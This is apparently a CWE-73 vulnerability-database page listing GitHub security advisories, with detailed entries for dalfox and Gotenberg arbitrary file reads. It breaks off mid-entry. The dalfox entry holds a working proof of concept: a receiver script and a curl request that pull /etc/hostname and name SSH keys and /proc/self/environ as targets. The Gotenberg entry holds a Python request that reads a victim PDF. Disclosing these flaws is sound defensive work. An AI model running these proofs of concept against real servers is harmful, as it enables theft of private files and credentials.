CWE-73
AllowedExternal Control of File Name or Path
Abstraction: Base · Status: Draft
The product allows user input to control or influence paths or file names that are used in filesystem operations.
917 vulnerabilities reference this CWE, most recent first.
GHSA-35WR-X7V6-9FV2
Vulnerability from github – Published: 2026-05-12 15:08 – Updated: 2026-06-08 23:50Summary
When dalfox is run in REST API server mode, the custom-payload-file field in model.Options is JSON-tagged and deserialized directly from the attacker's request body, then propagated unchanged through dalfox.Initialize into the scan engine. The engine passes the value to voltFile.ReadLinesOrLiteral, which reads lines from any file path accessible to the dalfox process and embeds each line as an XSS payload in outbound HTTP requests directed at the attacker-controlled target URL. Because the server has no API key by default, an unauthenticated network attacker can exfiltrate the contents of arbitrary files on the dalfox host by reading them line-by-line through scan traffic.
Severity
High (CVSS 3.1: 7.5)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- Attack Vector: Network — server binds to
0.0.0.0:6664by default; reachable by any network peer. - Attack Complexity: Low — no preconditions beyond network access;
skip-discoveryandparamare both attacker-supplied, so the code path is fully under attacker control. - Privileges Required: None —
--api-keydefaults to"", so the auth middleware is not registered. - User Interaction: None.
- Scope: Unchanged — the file read and the outbound HTTP exfiltration request both originate from the same dalfox process authority.
- Confidentiality Impact: High — the attacker can read any file the dalfox process can open: private keys, configuration files containing database credentials, environment files,
/etc/passwd, etc. - Integrity Impact: None — this path is read-only.
- Availability Impact: None.
Affected Component
cmd/server.go—init()(line 51):--api-keydefaults to""— no auth by defaultpkg/server/server.go—setupEchoServer()(line 68): auth middleware only registered whenAPIKey != ""pkg/server/server.go—postScanHandler()(lines 173–191):rq.Options(includingCustomPayloadFile) passed toScanFromAPIwithout sanitizationlib/func.go—Initialize()(line 117):CustomPayloadFileexplicitly propagated from caller optionspkg/scanning/scan.go— anonymous block (lines 341–368):voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)reads file; contents injected into outbound requests
CWE
- CWE-306: Missing Authentication for Critical Function
- CWE-73: External Control of File Name or Path
- CWE-552: Files or Directories Accessible to External Parties
Description
custom-payload-file Is Fully Attacker-Controlled
model.Options exposes CustomPayloadFile with a JSON tag:
// pkg/model/options.go:33
CustomPayloadFile string `json:"custom-payload-file,omitempty"`
postScanHandler binds the entire Req.Options from the JSON body and passes it directly to ScanFromAPI:
// pkg/server/server.go:173-191
rq := new(Req)
if err := c.Bind(rq); err != nil { ... }
go ScanFromAPI(rq.URL, rq.Options, *options, sid)
ScanFromAPI passes rqOptions as target.Options to dalfox.Initialize:
// pkg/server/scan.go:22-27
target := dalfox.Target{
URL: url,
Method: rqOptions.Method,
Options: rqOptions,
}
newOptions := dalfox.Initialize(target, target.Options)
Initialize explicitly copies CustomPayloadFile into newOptions with no filtering:
// lib/func.go:117
"CustomPayloadFile": {&newOptions.CustomPayloadFile, options.CustomPayloadFile},
File Read and Exfiltration Path
In pkg/scanning/scan.go, when the scan engine reaches the custom payload phase, it reads the attacker-specified file path:
// pkg/scanning/scan.go:341-366
if (options.SkipDiscovery || utils.IsAllowType(policy["Content-Type"])) && options.CustomPayloadFile != "" {
ff, err := voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)
if err != nil {
printing.DalLog("SYSTEM", "Failed to load custom XSS payload file", options)
} else {
for _, customPayload := range ff {
if customPayload != "" {
for k, v := range params {
if optimization.CheckInspectionParam(options, k) {
...
tq, tm := optimization.MakeRequestQuery(target, k, customPayload, "inHTML"+ptype, "toAppend", encoder, options)
query[tq] = tm
}
}
}
}
}
}
Each line of the file becomes a payload value embedded in a query parameter of an HTTP request sent to the attacker-controlled target URL. performScanning then dispatches every entry in the query map via SendReq, delivering the file's contents to the attacker's server as the value of the nominated parameter (e.g., ?q=<file-line>).
Condition Is Trivially Satisfiable
The condition options.SkipDiscovery || utils.IsAllowType(policy["Content-Type"]) is satisfied by setting skip-discovery: true in the JSON request body — a field the attacker fully controls. When SkipDiscovery is true, the engine also requires at least one parameter via UniqParam (the -p flag), which the attacker supplies as param: ["q"]. The code then hardcodes policy["Content-Type"] = "text/html" and populates params["q"] automatically:
// pkg/scanning/scan.go:224-240
if len(options.UniqParam) == 0 {
return scanResult, fmt.Errorf("--skip-discovery requires parameters to be specified with -p flag")
}
for _, paramName := range options.UniqParam {
params[paramName] = model.ParamResult{
Name: paramName, Type: "URL", Reflected: true, Chars: payload.GetSpecialChar(),
}
}
policy["Content-Type"] = "text/html"
Both conditions are fully attacker-controlled through the JSON request body.
No Defense at Any Layer
The same opt-in API key guard from the first finding applies identically here:
// pkg/server/server.go:68-70
if options.ServerType == "rest" && options.APIKey != "" {
e.Use(apiKeyAuth(options.APIKey, options))
}
With the default empty API key, no middleware is installed and every endpoint is unauthenticated. There is no path sanitization, no allowlist, and no IsAPI guard around the CustomPayloadFile read.
Proof of Concept
# Step 1 — Attacker-controlled receiver (logs q= parameter to stdout)
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
def do_GET(self):
q = parse_qs(urlparse(self.path).query).get('q', [''])[0]
print("[RECEIVED] q =", q, flush=True)
body = b'<html><body>ok</body></html>'
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', str(len(body)))
self.end_headers()
self.wfile.write(body)
def log_message(self, *a): pass
HTTPServer(('127.0.0.1', 18081), H).serve_forever()
PY
# Step 2 — Start dalfox REST server (default: no API key)
go run . server --host 127.0.0.1 --port 16664 --type rest
# Step 3 — Exfiltrate /etc/hostname (or any file readable by the dalfox process)
curl -s -X POST http://127.0.0.1:16664/scan \
-H 'Content-Type: application/json' \
--data '{
"url": "http://127.0.0.1:18081/?q=test",
"options": {
"custom-payload-file": "/etc/hostname",
"only-custom-payload": true,
"skip-discovery": true,
"param": ["q"],
"use-headless": false,
"worker": 1
}
}'
# Expected output on the receiver (Step 1 terminal):
# [RECEIVED] q = myhostname.local
# For multi-line files (e.g. /etc/passwd), each line arrives as a separate request
No X-API-KEY header is required. Replace /etc/hostname with any file path accessible to the dalfox process (e.g., ~/.ssh/id_rsa, /run/secrets/db_password, /proc/self/environ).
Impact
- Arbitrary file read on the dalfox host: any file readable by the dalfox process (SSH private keys, TLS certificates,
.envfiles, cloud credential files,/proc/self/environ) can be exfiltrated one line at a time. - No authentication required under the default configuration.
- The exfiltration channel is the dalfox host's own outbound HTTP scan traffic — no inbound connection from the attacker to the dalfox host is needed beyond the initial REST API call.
- Combined with the
found-actionRCE finding (separate issue), an attacker could first read/proc/self/environto harvest secrets, then execute commands.
Recommended Remediation
Option 1: Strip filesystem-dangerous fields from API-sourced requests (preferred)
Apply a denylist of fields that should never be accepted from the REST API, regardless of auth state. This protects authenticated deployments against credential-theft or privilege escalation by external API consumers:
// pkg/server/server.go — in postScanHandler, before ScanFromAPI:
rq.Options.CustomPayloadFile = ""
rq.Options.CustomBlindXSSPayloadFile = ""
rq.Options.FoundAction = ""
rq.Options.FoundActionShell = ""
rq.Options.OutputFile = ""
rq.Options.HarFilePath = ""
Option 2: Require --api-key at server startup
Make authentication mandatory and refuse to start without it:
// cmd/server.go — in runServerCmd:
if serverType == "rest" && apiKey == "" {
fmt.Fprintln(os.Stderr, "ERROR: --api-key is required when running in REST server mode.")
os.Exit(1)
}
Both options should be applied together. Option 2 prevents unauthenticated access to the API entirely; Option 1 ensures that even trusted API callers cannot leverage the server to read files from the host filesystem.
Credit
Emmanuel David
Github:- https://github.com/drmingler
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.12.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/hahwul/dalfox/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45088"
],
"database_specific": {
"cwe_ids": [
"CWE-306",
"CWE-552",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-12T15:08:13Z",
"nvd_published_at": "2026-05-27T18:16:24Z",
"severity": "HIGH"
},
"details": "## Summary\n\nWhen dalfox is run in REST API server mode, the `custom-payload-file` field in `model.Options` is JSON-tagged and deserialized directly from the attacker\u0027s request body, then propagated unchanged through `dalfox.Initialize` into the scan engine. The engine passes the value to `voltFile.ReadLinesOrLiteral`, which reads lines from any file path accessible to the dalfox process and embeds each line as an XSS payload in outbound HTTP requests directed at the attacker-controlled target URL. Because the server has no API key by default, an unauthenticated network attacker can exfiltrate the contents of arbitrary files on the dalfox host by reading them line-by-line through scan traffic.\n\n## Severity\n\n**High** (CVSS 3.1: 7.5)\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`\n\n- **Attack Vector:** Network \u2014 server binds to `0.0.0.0:6664` by default; reachable by any network peer.\n- **Attack Complexity:** Low \u2014 no preconditions beyond network access; `skip-discovery` and `param` are both attacker-supplied, so the code path is fully under attacker control.\n- **Privileges Required:** None \u2014 `--api-key` defaults to `\"\"`, so the auth middleware is not registered.\n- **User Interaction:** None.\n- **Scope:** Unchanged \u2014 the file read and the outbound HTTP exfiltration request both originate from the same dalfox process authority.\n- **Confidentiality Impact:** High \u2014 the attacker can read any file the dalfox process can open: private keys, configuration files containing database credentials, environment files, `/etc/passwd`, etc.\n- **Integrity Impact:** None \u2014 this path is read-only.\n- **Availability Impact:** None.\n\n## Affected Component\n\n- `cmd/server.go` \u2014 `init()` (line 51): `--api-key` defaults to `\"\"` \u2014 no auth by default\n- `pkg/server/server.go` \u2014 `setupEchoServer()` (line 68): auth middleware only registered when `APIKey != \"\"`\n- `pkg/server/server.go` \u2014 `postScanHandler()` (lines 173\u2013191): `rq.Options` (including `CustomPayloadFile`) passed to `ScanFromAPI` without sanitization\n- `lib/func.go` \u2014 `Initialize()` (line 117): `CustomPayloadFile` explicitly propagated from caller options\n- `pkg/scanning/scan.go` \u2014 anonymous block (lines 341\u2013368): `voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)` reads file; contents injected into outbound requests\n\n## CWE\n\n- **CWE-306**: Missing Authentication for Critical Function\n- **CWE-73**: External Control of File Name or Path\n- **CWE-552**: Files or Directories Accessible to External Parties\n\n## Description\n\n### `custom-payload-file` Is Fully Attacker-Controlled\n\n`model.Options` exposes `CustomPayloadFile` with a JSON tag:\n\n```go\n// pkg/model/options.go:33\nCustomPayloadFile string `json:\"custom-payload-file,omitempty\"`\n```\n\n`postScanHandler` binds the entire `Req.Options` from the JSON body and passes it directly to `ScanFromAPI`:\n\n```go\n// pkg/server/server.go:173-191\nrq := new(Req)\nif err := c.Bind(rq); err != nil { ... }\ngo ScanFromAPI(rq.URL, rq.Options, *options, sid)\n```\n\n`ScanFromAPI` passes `rqOptions` as `target.Options` to `dalfox.Initialize`:\n\n```go\n// pkg/server/scan.go:22-27\ntarget := dalfox.Target{\n URL: url,\n Method: rqOptions.Method,\n Options: rqOptions,\n}\nnewOptions := dalfox.Initialize(target, target.Options)\n```\n\n`Initialize` explicitly copies `CustomPayloadFile` into `newOptions` with no filtering:\n\n```go\n// lib/func.go:117\n\"CustomPayloadFile\": {\u0026newOptions.CustomPayloadFile, options.CustomPayloadFile},\n```\n\n### File Read and Exfiltration Path\n\nIn `pkg/scanning/scan.go`, when the scan engine reaches the custom payload phase, it reads the attacker-specified file path:\n\n```go\n// pkg/scanning/scan.go:341-366\nif (options.SkipDiscovery || utils.IsAllowType(policy[\"Content-Type\"])) \u0026\u0026 options.CustomPayloadFile != \"\" {\n ff, err := voltFile.ReadLinesOrLiteral(options.CustomPayloadFile)\n if err != nil {\n printing.DalLog(\"SYSTEM\", \"Failed to load custom XSS payload file\", options)\n } else {\n for _, customPayload := range ff {\n if customPayload != \"\" {\n for k, v := range params {\n if optimization.CheckInspectionParam(options, k) {\n ...\n tq, tm := optimization.MakeRequestQuery(target, k, customPayload, \"inHTML\"+ptype, \"toAppend\", encoder, options)\n query[tq] = tm\n }\n }\n }\n }\n }\n}\n```\n\nEach line of the file becomes a payload value embedded in a query parameter of an HTTP request sent to the attacker-controlled target URL. `performScanning` then dispatches every entry in the `query` map via `SendReq`, delivering the file\u0027s contents to the attacker\u0027s server as the value of the nominated parameter (e.g., `?q=\u003cfile-line\u003e`).\n\n### Condition Is Trivially Satisfiable\n\nThe condition `options.SkipDiscovery || utils.IsAllowType(policy[\"Content-Type\"])` is satisfied by setting `skip-discovery: true` in the JSON request body \u2014 a field the attacker fully controls. When `SkipDiscovery` is true, the engine also requires at least one parameter via `UniqParam` (the `-p` flag), which the attacker supplies as `param: [\"q\"]`. The code then hardcodes `policy[\"Content-Type\"] = \"text/html\"` and populates `params[\"q\"]` automatically:\n\n```go\n// pkg/scanning/scan.go:224-240\nif len(options.UniqParam) == 0 {\n return scanResult, fmt.Errorf(\"--skip-discovery requires parameters to be specified with -p flag\")\n}\nfor _, paramName := range options.UniqParam {\n params[paramName] = model.ParamResult{\n Name: paramName, Type: \"URL\", Reflected: true, Chars: payload.GetSpecialChar(),\n }\n}\npolicy[\"Content-Type\"] = \"text/html\"\n```\n\nBoth conditions are fully attacker-controlled through the JSON request body.\n\n### No Defense at Any Layer\n\nThe same opt-in API key guard from the first finding applies identically here:\n\n```go\n// pkg/server/server.go:68-70\nif options.ServerType == \"rest\" \u0026\u0026 options.APIKey != \"\" {\n e.Use(apiKeyAuth(options.APIKey, options))\n}\n```\n\nWith the default empty API key, no middleware is installed and every endpoint is unauthenticated. There is no path sanitization, no allowlist, and no `IsAPI` guard around the `CustomPayloadFile` read.\n\n## Proof of Concept\n\n```bash\n# Step 1 \u2014 Attacker-controlled receiver (logs q= parameter to stdout)\npython3 - \u003c\u003c\u0027PY\u0027\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import urlparse, parse_qs\nclass H(BaseHTTPRequestHandler):\n def do_GET(self):\n q = parse_qs(urlparse(self.path).query).get(\u0027q\u0027, [\u0027\u0027])[0]\n print(\"[RECEIVED] q =\", q, flush=True)\n body = b\u0027\u003chtml\u003e\u003cbody\u003eok\u003c/body\u003e\u003c/html\u003e\u0027\n self.send_response(200)\n self.send_header(\u0027Content-Type\u0027, \u0027text/html\u0027)\n self.send_header(\u0027Content-Length\u0027, str(len(body)))\n self.end_headers()\n self.wfile.write(body)\n def log_message(self, *a): pass\nHTTPServer((\u0027127.0.0.1\u0027, 18081), H).serve_forever()\nPY\n\n# Step 2 \u2014 Start dalfox REST server (default: no API key)\ngo run . server --host 127.0.0.1 --port 16664 --type rest\n\n# Step 3 \u2014 Exfiltrate /etc/hostname (or any file readable by the dalfox process)\ncurl -s -X POST http://127.0.0.1:16664/scan \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\n \"url\": \"http://127.0.0.1:18081/?q=test\",\n \"options\": {\n \"custom-payload-file\": \"/etc/hostname\",\n \"only-custom-payload\": true,\n \"skip-discovery\": true,\n \"param\": [\"q\"],\n \"use-headless\": false,\n \"worker\": 1\n }\n }\u0027\n\n# Expected output on the receiver (Step 1 terminal):\n# [RECEIVED] q = myhostname.local\n\n# For multi-line files (e.g. /etc/passwd), each line arrives as a separate request\n```\n\nNo `X-API-KEY` header is required. Replace `/etc/hostname` with any file path accessible to the dalfox process (e.g., `~/.ssh/id_rsa`, `/run/secrets/db_password`, `/proc/self/environ`).\n\n## Impact\n\n- **Arbitrary file read** on the dalfox host: any file readable by the dalfox process (SSH private keys, TLS certificates, `.env` files, cloud credential files, `/proc/self/environ`) can be exfiltrated one line at a time.\n- **No authentication required** under the default configuration.\n- The exfiltration channel is the dalfox host\u0027s own outbound HTTP scan traffic \u2014 no inbound connection from the attacker to the dalfox host is needed beyond the initial REST API call.\n- Combined with the `found-action` RCE finding (separate issue), an attacker could first read `/proc/self/environ` to harvest secrets, then execute commands.\n\n## Recommended Remediation\n\n### Option 1: Strip filesystem-dangerous fields from API-sourced requests (preferred)\n\nApply a denylist of fields that should never be accepted from the REST API, regardless of auth state. This protects authenticated deployments against credential-theft or privilege escalation by external API consumers:\n\n```go\n// pkg/server/server.go \u2014 in postScanHandler, before ScanFromAPI:\nrq.Options.CustomPayloadFile = \"\"\nrq.Options.CustomBlindXSSPayloadFile = \"\"\nrq.Options.FoundAction = \"\"\nrq.Options.FoundActionShell = \"\"\nrq.Options.OutputFile = \"\"\nrq.Options.HarFilePath = \"\"\n```\n\n### Option 2: Require `--api-key` at server startup\n\nMake authentication mandatory and refuse to start without it:\n\n```go\n// cmd/server.go \u2014 in runServerCmd:\nif serverType == \"rest\" \u0026\u0026 apiKey == \"\" {\n fmt.Fprintln(os.Stderr, \"ERROR: --api-key is required when running in REST server mode.\")\n os.Exit(1)\n}\n```\n\nBoth options should be applied together. Option 2 prevents unauthenticated access to the API entirely; Option 1 ensures that even trusted API callers cannot leverage the server to read files from the host filesystem.\n\n##Credit\n\nEmmanuel David\n\nGithub:- https://github.com/drmingler",
"id": "GHSA-35wr-x7v6-9fv2",
"modified": "2026-06-08T23:50:09Z",
"published": "2026-05-12T15:08:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/hahwul/dalfox/security/advisories/GHSA-35wr-x7v6-9fv2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45088"
},
{
"type": "PACKAGE",
"url": "https://github.com/hahwul/dalfox"
},
{
"type": "WEB",
"url": "https://github.com/hahwul/dalfox/releases/tag/v2.13.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Dalfox Server Mode has an Unauthenticated Arbitrary File Read with Out-of-Band Exfiltration via `custom-payload-file`"
}
GHSA-3754-C64R-8C26
Vulnerability from github – Published: 2026-03-21 06:30 – Updated: 2026-03-21 06:30The Task Manager plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.0.2 via the callback_get_text_from_url() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.
{
"affected": [],
"aliases": [
"CVE-2026-2351"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-21T04:16:58Z",
"severity": "MODERATE"
},
"details": "The Task Manager plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.0.2 via the callback_get_text_from_url() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.",
"id": "GHSA-3754-c64r-8c26",
"modified": "2026-03-21T06:30:24Z",
"published": "2026-03-21T06:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2351"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/task-manager/tags/3.0.2/module/import/action/class-import-action.php#L203"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/task-manager/trunk/module/import/action/class-import-action.php#L203"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/task-manager"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cd959968-d3f0-4546-8fc6-eb451b417f0d?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3CH5-8236-6HMM
Vulnerability from github – Published: 2024-09-25 03:30 – Updated: 2026-06-02 09:36External Control of File Name or Path, : Incorrect Permission Assignment for Critical Resource vulnerability in Olgu Computer Systems e-Belediye allows Manipulating Web Input to File System Calls.This issue affects e-Belediye: before 2.0.642.
{
"affected": [],
"aliases": [
"CVE-2024-9142"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-25T01:15:49Z",
"severity": "CRITICAL"
},
"details": "External Control of File Name or Path, : Incorrect Permission Assignment for Critical Resource vulnerability in Olgu Computer Systems e-Belediye allows Manipulating Web Input to File System Calls.This issue affects e-Belediye: before 2.0.642.",
"id": "GHSA-3ch5-8236-6hmm",
"modified": "2026-06-02T09:36:12Z",
"published": "2024-09-25T03:30:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9142"
},
{
"type": "WEB",
"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-24-1527"
},
{
"type": "WEB",
"url": "https://www.usom.gov.tr/bildirim/tr-24-1527"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-3CV5-Q585-H563
Vulnerability from github – Published: 2026-05-07 00:59 – Updated: 2026-05-14 20:52Summary
Six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown) accept stampSource=pdf + stampExpression=/path and watermarkSource=pdf + watermarkExpression=/path from anonymous callers. The dedicated stamp/watermark routes require an uploaded file when the source type is image or pdf; these six routes only overwrite the expression when a file is uploaded, leaving the user-controlled path intact when no file is attached. pdfcpu opens the path and composites its pages onto the output PDF, which returns to the caller. An attacker reads any PDF the Gotenberg process can access on the container filesystem.
Details
The dedicated stamp route at pkg/modules/pdfengines/routes.go:1322-1332 rejects requests missing the stamp file:
if stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {
if stampFile == "" {
return api.WrapError(errors.New("no stamp file provided"), ...)
}
stamp.Expression = stampFile
}
The merge, split, LibreOffice, and Chromium routes use a lax pattern across twelve call sites (six stamp + six watermark):
// pkg/modules/pdfengines/routes.go:679-683 (merge), 803 (split);
// pkg/modules/libreoffice/routes.go:307-311;
// pkg/modules/chromium/routes.go:433-438, 508-513, 592-597
if (stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF) && stampFile != "" {
stamp.Expression = stampFile
}
if (watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF) && watermarkFile != "" {
watermark.Expression = watermarkFile
}
When stampFile == "" (no file attached to the stamp form field), the guard short-circuits and stamp.Expression keeps the raw user-supplied stampExpression form string. The same pattern applies to watermarkFile/watermarkExpression.
pkg/modules/pdfcpu/pdfcpu.go:635 forwards the expression straight to the pdfcpu CLI:
args := []string{"stamp", "add", "-mode", "pdf", "--", stamp.Expression, onDesc, inputPath, outputPath}
cmd, err := gotenberg.CommandContext(ctx, logger, cfg.BinPath, args...)
pdfcpu reads the target PDF at that path and composites its pages as a stamp on every page of the merged output.
Proof of Concept
Reproduction on the stock Docker image. The scenario models a deployment that mounts host paths into the container (common for document-processing pipelines) or where another request leaves a PDF in the shared /tmp filesystem:
docker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8
docker exec gotenberg-poc sh -c 'cat > /tmp/victim_doc.pdf' < victim.pdf
Where victim.pdf contains extractable text such as BOB-CONFIDENTIAL-CONTRACT-2026-04-20.
Alice attacks without auth:
import requests, io, subprocess
T = "http://localhost:3000"
minimal = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n"
b"xref\n0 4\n0000000000 65535 f \n0000000009 00000 n \n"
b"0000000058 00000 n \n0000000115 00000 n \n"
b"trailer\n<< /Size 4 /Root 1 0 R >>\nstartxref\n180\n%%EOF\n")
r = requests.post(
f"{T}/forms/pdfengines/merge",
files={"file1": ("a.pdf", io.BytesIO(minimal), "application/pdf"),
"file2": ("b.pdf", io.BytesIO(minimal), "application/pdf")},
data={"stampSource": "pdf", "stampExpression": "/tmp/victim_doc.pdf"},
timeout=30,
)
print(f"HTTP {r.status_code} bytes={len(r.content)}")
open("/tmp/out.pdf", "wb").write(r.content)
print(subprocess.run(["pdftotext", "/tmp/out.pdf", "-"],
capture_output=True, text=True).stdout)
Observed output against gotenberg 8.31.0:
HTTP 200 bytes=1852
BOB-CONFIDENTIAL-CONTRACT-2026-04-20
...
Non-PDF targets via stampSource=pdf (for example /etc/hostname) return HTTP 500 after pdfcpu fails to parse the file as PDF, which acts as a file-existence oracle. stampSource=image with non-image files returns HTTP 400 (image parsing rejects it). The same PoC applies with stampSource replaced by watermarkSource and stampExpression by watermarkExpression.
Impact
Any anonymous caller with access to port 3000 reads PDF files from any path the Gotenberg process can open. In the default Docker image with no volume mounts, the reachable set is limited to /tmp/<gotenberg-work-uuid>/<request-uuid>/*.pdf (files staged during another in-flight request) and any PDF files the base image happens to ship. In deployments that bind-mount host directories into the container (document processing pipelines, shared storage for Office document conversion), the attacker reads arbitrary PDF files under those mount points. The file-existence oracle additionally lets the attacker probe for the presence of non-PDF files anywhere the process can read.
Recommended Fix
Apply the dedicated stamp route's guard to all six stamp call sites and all six watermark call sites:
if stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {
if stampFile == "" {
return api.WrapError(
errors.New("no stamp file provided for image or pdf source"),
api.NewSentinelHttpError(http.StatusBadRequest,
"Invalid form data: a stamp file is required for image or pdf source"),
)
}
stamp.Expression = stampFile
}
if watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF {
if watermarkFile == "" {
return api.WrapError(
errors.New("no watermark file provided for image or pdf source"),
api.NewSentinelHttpError(http.StatusBadRequest,
"Invalid form data: a watermark file is required for image or pdf source"),
)
}
watermark.Expression = watermarkFile
}
Call sites: pkg/modules/pdfengines/routes.go:679-683 (merge), :803-807 (split), pkg/modules/libreoffice/routes.go:307-311, pkg/modules/chromium/routes.go:433-438 (url), :508-513 (html), :592-597 (markdown), plus each route's watermark counterpart.
Found by aisafe.io
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/gotenberg/gotenberg/v8"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "8.31.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42593"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-07T00:59:50Z",
"nvd_published_at": "2026-05-14T16:16:22Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nSix conversion routes (`pdfengines/merge`, `pdfengines/split`, `libreoffice/convert`, `chromium/convert/url`, `chromium/convert/html`, `chromium/convert/markdown`) accept `stampSource=pdf` + `stampExpression=/path` and `watermarkSource=pdf` + `watermarkExpression=/path` from anonymous callers. The dedicated stamp/watermark routes require an uploaded file when the source type is image or pdf; these six routes only overwrite the expression when a file is uploaded, leaving the user-controlled path intact when no file is attached. pdfcpu opens the path and composites its pages onto the output PDF, which returns to the caller. An attacker reads any PDF the Gotenberg process can access on the container filesystem.\n\n## Details\n\nThe dedicated stamp route at `pkg/modules/pdfengines/routes.go:1322-1332` rejects requests missing the stamp file:\n\n```go\nif stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {\n if stampFile == \"\" {\n return api.WrapError(errors.New(\"no stamp file provided\"), ...)\n }\n stamp.Expression = stampFile\n}\n```\n\nThe merge, split, LibreOffice, and Chromium routes use a lax pattern across twelve call sites (six stamp + six watermark):\n\n```go\n// pkg/modules/pdfengines/routes.go:679-683 (merge), 803 (split);\n// pkg/modules/libreoffice/routes.go:307-311;\n// pkg/modules/chromium/routes.go:433-438, 508-513, 592-597\nif (stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF) \u0026\u0026 stampFile != \"\" {\n stamp.Expression = stampFile\n}\nif (watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF) \u0026\u0026 watermarkFile != \"\" {\n watermark.Expression = watermarkFile\n}\n```\n\nWhen `stampFile == \"\"` (no file attached to the `stamp` form field), the guard short-circuits and `stamp.Expression` keeps the raw user-supplied `stampExpression` form string. The same pattern applies to `watermarkFile`/`watermarkExpression`.\n\n`pkg/modules/pdfcpu/pdfcpu.go:635` forwards the expression straight to the pdfcpu CLI:\n\n```go\nargs := []string{\"stamp\", \"add\", \"-mode\", \"pdf\", \"--\", stamp.Expression, onDesc, inputPath, outputPath}\ncmd, err := gotenberg.CommandContext(ctx, logger, cfg.BinPath, args...)\n```\n\npdfcpu reads the target PDF at that path and composites its pages as a stamp on every page of the merged output.\n\n## Proof of Concept\n\nReproduction on the stock Docker image. The scenario models a deployment that mounts host paths into the container (common for document-processing pipelines) or where another request leaves a PDF in the shared `/tmp` filesystem:\n\n```bash\ndocker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8\ndocker exec gotenberg-poc sh -c \u0027cat \u003e /tmp/victim_doc.pdf\u0027 \u003c victim.pdf\n```\n\nWhere `victim.pdf` contains extractable text such as `BOB-CONFIDENTIAL-CONTRACT-2026-04-20`.\n\nAlice attacks without auth:\n\n```python\nimport requests, io, subprocess\nT = \"http://localhost:3000\"\n\nminimal = (b\"%PDF-1.4\\n1 0 obj\\n\u003c\u003c 